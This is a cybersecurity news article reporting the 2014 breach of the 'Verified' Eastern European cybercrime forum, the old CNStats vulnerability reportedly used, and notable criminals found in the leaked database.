Categories: Cyber Crime

Large communities of Eastern Europe cybercriminals Verified was hacked

 

One of the largest communities of Eastern Europe cybercriminals “Verified” was hacked, more than 18,894 bad actors revealed after several hours.

According to sources at IntelCrawler, cyberintelligence firm from Los Angeles, the largest community of Eastern Europe cybercriminals “Verified” was hacked several hours ago.

The hackers hit the online community stealing member information and login credentials from the site’s forum database late Tuesday, it is still not confirmed, but the attackers could be members of a rival cyber gang managing a crime forum.

IntelCrawler is one of the most interesting realities in the cyberintelligence scenario, a few weeks ago they discovered a Russian-speaking group offers bulletproof hosting in Syria and Lebanon, just yesterday I published a post on another analysis made by its specialists on VSAT terminals vulnerabilities.

 

The event is considerable serious in the underground communities, security and anonymity are requirements fundamental for the model of sale known as fraud-as-a-service, specialized forums like Verified offer product and services to criminal gangs to advantage their illegal activities. The Verified forum is specialized in online banking and financial frauds against organizations in US, UK and Australia.

«It is good example, that there is insecurity of cybercriminals communities too, besides resources they prefer to hack. Sometimes it helps investigators to find bad actors profiles and to arrest them, doing deep e-crime intelligence» – comment IntelCrawler researchers.

The Verified data breach exposed all the uploaded attachments on forum since 2011, as well as to download MySQL database with all cybercriminals user accounts and credentials.

The attack was very smart, the hackers have exploited a vulnerability in one of third party WEB-applications used for traffic and statistics monitoring «CNStats STD 4.3» – CVE-2007-2087.

 “Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.” is the description of the vulnerability from National vulnerability Database.

 

The database was uploaded to Sendspace and according to operative information the responsible for the attack are the owners of another cyber criminal forum.

 

 

Giving a closer look to the dump of the Database it is possible to find the name of popular cyber criminals, including the famous spammer “SEVERA”, former partner of Alan Ralsky, arrested by US LEA. “Severa” is also widely known as spammer, who had one of the first spam services on famous underground forum “Carberplant” closed by LEA quite long time ago. On January 8th, 2014 Ukrainian SBU has announced the arrest of the hacker “4×4” (UA), “4×4” was also a member of Verified hacked forum, as well as other famous cybercriminal such as Zoomer and KrenJo (very famous dumps sellers from Eastern Europe).

“4×4”: “Aren’t you working with OPTIVA trojan? If – yes, there is large deal for it”. The OPTIVA trojan is one of private banking trojans they used for online-banking theft. states one of translated extracted private messages.
By the way, Zoomer was mentioned in New York times in 2005 and by RSA as well, as very serious dumps seller.

Some of user accounts are dated, they were created in 2005 when the community was just created, in terms of security most of the users are using e-mails in various jurisdictions and “safe-mail.net”.

The community, born in 2005, became very popular for trading of new exploit-kits, the author of “Blackhole” Exploit-Kit Paunch was one the advertisers there.

Pierluigi Paganini

(Security Affairs –  Verified forum, cybercrime)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

Google: China dominates government exploitation of zero-day vulnerabilities in 2023

Google's Threat Analysis Group (TAG) and Mandiant reported a surge in the number of actively…

3 hours ago

Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024

Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during…

14 hours ago

INC Ransom stole 3TB of data from the National Health Service (NHS) of Scotland

The INC Ransom extortion group hacked the National Health Service (NHS) of Scotland and is threatening…

18 hours ago

CISA adds Microsoft SharePoint bug disclosed at Pwn2Own to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft SharePoint vulnerability disclosed at the…

24 hours ago

The DDR Advantage: Real-Time Data Defense

This is the advantage of Data Detection and Response (DDR) for organizations aiming to build…

1 day ago

Finnish police linked APT31 to the 2021 parliament attack

The Finnish Police attributed the attack against the parliament that occurred in March 2021 to…

1 day ago

This website uses cookies.